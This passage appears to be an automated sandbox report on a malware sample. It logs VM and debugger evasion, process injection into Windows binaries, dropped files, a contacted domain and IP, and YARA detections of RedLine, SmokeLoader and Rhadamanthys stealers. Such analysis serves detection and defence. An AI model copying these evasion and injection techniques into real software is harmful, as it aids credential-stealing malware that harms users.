Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\fontview.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\explorer.exe TID: 3980	Thread sleep count: 348 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5468	Thread sleep count: 211 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6076	Thread sleep count: 83 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3652	Thread sleep time: -240000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_6-23805

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\beirutt

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_7-5902

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 854			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 844			Jump to behavior

Source: C:\Windows\SysWOW64\fontview.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\C4AA.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4434343.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 5170000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 5170000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 5170000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Memory allocated: 5170000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\fontview.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: explorer.exe, 00000003.00000000.387586822.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000003.00000000.384012109.00000000059F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: C4AA.exe, 00000009.00000002.573780441.000000000123A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000003.00000003.449577540.0000000008394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWG5f(
Source: explorer.exe, 00000003.00000003.450669727.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DllRegisterServerwkANimhDMAwWV3szQXyvBuPQC78zCscyzexusDvMOYwfSOSysandboxk5iQr5xKkhFi0oixFMGqksOZvxBFcBSxp0cQkIPrNCyQHM3wLlxT6Cdbbs26eSkv7845SwCp2eblGwhvHDTWSogz9U9CgzzsDh2um9tzTcXYzLxsGKNiDiwisTXFFjpshttp://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2sMicrosoft Basic Display AdapterapxALpLEWoMRTxoqbiS5VVQOzJTDWDypDWoJSVZo2QACQsioYxzAfz3u9IKX2BQn6EzzoxJp5PsUZkqmTghzqELr5eG7GRimerCTfOUnCFE4bGUm7h3r60PJIoCTMJ0m%lS\%d.dllQU673JXmPb9xS6blT0XDs1ALT0EJ5hLlaKOwfxnBjFiiOltkI8wpbYDtnFYR40qjP9YSa5NKhRybkS7ixE6tWUfx1eVdsUkhnifax tegawo nip xehN9YxfM4WgP9Yuo5hXPmc4XQ1BZlDjlngvboxtray.exevmwaretray.exewechat.exevmwareuser.exeFiddler.exeprocesshacker.exeqq.exeprocexp.exerdpclip.exeWireshark.exeKawexi gequeci bovoj.exevboxservice.exeVGAuthService.exevmtoolsd.exeprl_cc.exeHTTPDebuggerUI.exeHttpAnalyzerStdV7.exePROCEXP64.exe9vcQbULrEEOHDRqecloudsafelineyq7T94qzPuDeOrTe80urpbYHQ3908aPeycDDggZJIPRjtkOe8J4Wdllbx1ApOW9evbZ1uo2T2UbMGtUdBSQDYJSbaLF5CgvcsFImbSiBECUOLzpcIk2VP28ir0vTy4TbDYVLfRsd5XNE93cYiigvV5kbWQ4w2roU3OQVpirDLVGrVmVTmqRp5j7SuNTW6WJSccDmayghiNoZWAXRSZKcI5fN6d9y9HJRZHIX2jJ5ndQDFLbQ7Gsn9COrx41kruaQxiHNEOIqB1voNhHQfpG6n3LiJpAEsKGQbMh2wfPZkMIH3jpNw2wwL4qOww0SAvLN7QPqaculbYlOPumLDjFmGrxyrkqKoVNJkrD4pQP2PQ8FNc7JabGGRSw4W0K7VSsICQYE9Jt8N0nVh1MITQsnOGZQBxmijylHv2DLczJ486OVC7eHTPLwz4Nt1Dg4jsqGyzCqbMr6MBLZrXjGOxTXcYoA7fBPn0eGH7Ex8dg8NsycsAOGd5g0Nv7r0LVA09KGcaWtJO5Tb2I2LhAGZrMz4T0Epaso079GslJNUY5E4dliUTNFlXFuZSNaEVRrIGWChIYUgq9hHpqOdBLBiAQmME3ZwAAGkEJB4gPxySrtR5EFN43BbtxiTk2KKfog8JcArlOy8gS3rrvRRJNAUFJSzgakwzM2deQ8oCWpzq6o4rIWMrY77FlbkvUsfeYwtpb6Y2CToyPqlwYaqay5DndXG1BsVppP4Jq5WxP1Oq3y3dHBZrc5X4kw1cn7yJdb9J450JE0s2Rdql7gxWP4zkmA4WMYvM2YZr24zUIl8P9x5RU6f5F2Hm4yAEQ4STv1pKj0
Source: fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: explorer.exe, 00000003.00000003.450122194.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453675949.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.453871207.000000000D00E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.387586822.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_00428390 FindFirstFileExW,

6_2_00428390

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Thread information set: HideFromDebugger	Jump to behavior

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe

System information queried: CodeIntegrityInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\beirutt

7_2_0040A2E2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007AF939 push dword ptr fs:[00000030h]	0_2_007AF939
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0041E1B1 mov ecx, dword ptr fs:[00000030h]	6_2_0041E1B1
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_0042950B mov eax, dword ptr fs:[00000030h]	6_2_0042950B
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_006A8C2B push dword ptr fs:[00000030h]	6_2_006A8C2B

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00413DCA

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_0042BCAF GetProcessHeap,

6_2_0042BCAF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00414035 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00414035
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00413DCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00413DCA
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00417E53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00417E53
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_00413F2C SetUnhandledExceptionFilter,	6_2_00413F2C
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00408415 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00408415
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00407A2B SetUnhandledExceptionFilter,	7_2_00407A2B
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040A6C7 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0040A6C7
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_00406364 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00406364

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.3 80			Jump to behavior

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: beirutt.3.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory allocated: C:\Windows\SysWOW64\fontview.exe base: CD0000 protect: page read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Memory written: C:\Users\user\AppData\Local\Temp\43D0.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: CD0000 value starts with: 4D5A	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe

Thread created: C:\Windows\explorer.exe EIP: 4601B14

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 11C1008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: CD0000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe	Jump to behavior

Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Managerzx
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.387586822.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
Source: explorer.exe, 00000003.00000000.375241968.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progmanath
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
Source: fontview.exe, 0000000D.00000003.537869173.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
Source: fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: RtlDllShutdownInProgress_p0.System......./UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT

Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	6_2_0042B0E9
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: EnumSystemLocalesW,	6_2_0042B3D6
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: EnumSystemLocalesW,	6_2_0042B38B
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: EnumSystemLocalesW,	6_2_0042B471
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,	6_2_00423431
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,	6_2_0042B74F
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_0042B878
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetLocaleInfoW,	6_2_0042B97E
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_0042BA4D
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: EnumSystemLocalesW,	6_2_00422F0B
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: GetLocaleInfoA,	7_2_0040BB6C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_00413A75 cpuid

6_2_00413A75

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

6_2_00413CC0

Source: C:\Users\user\AppData\Local\Temp\C676.exe

Code function: 6_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA,

6_2_004041D0

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ngentask.exe PID: 4292, type: MEMORYSTR

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE
